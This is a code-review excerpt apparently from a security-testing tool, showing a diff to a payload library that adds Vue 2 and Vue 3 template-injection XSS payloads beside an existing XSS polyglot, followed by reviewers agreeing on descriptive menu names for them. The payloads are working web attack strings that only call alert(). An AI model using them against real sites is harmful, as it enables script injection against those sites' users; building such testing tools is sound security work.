scripts/lib/payload.js

```diff
@@ -173,7 +173,20 @@ window.Payload.SQLi = {
 }
 
 window.Payload.XSS = {
-  polyglot: value => "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e"
+  polyglot: value => "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e",
+
+  Vue: {
+    vue2_1: value => "{{_c.constructor`alert()`()}}",
+    vue2_2: value => "<x/v-if=_c.constructor`alert()`()>",
+    vue3_1: value => "{{$emit.constructor`alert()`()}}",
+    vue3_2: value => "<component is=script text=alert()>"  
```

Comment:
Based on payload, maybe we can give a semantic name in menu?
It is more convenient for user to know what payload he will get.

For example, `Vue2 - 1` to `Vue2 - Interpolation`, and etc.

Reply:
I changed their names to:

- Vue 2 - Interpolation
- Vue 2 - Directive
- Vue 3 - Interpolation
- Vue 3 - Dynamic Component

I'm not very familiar with Vue.js API.
Are these new names clear?

Reply:
Yes, I think it is clear enough.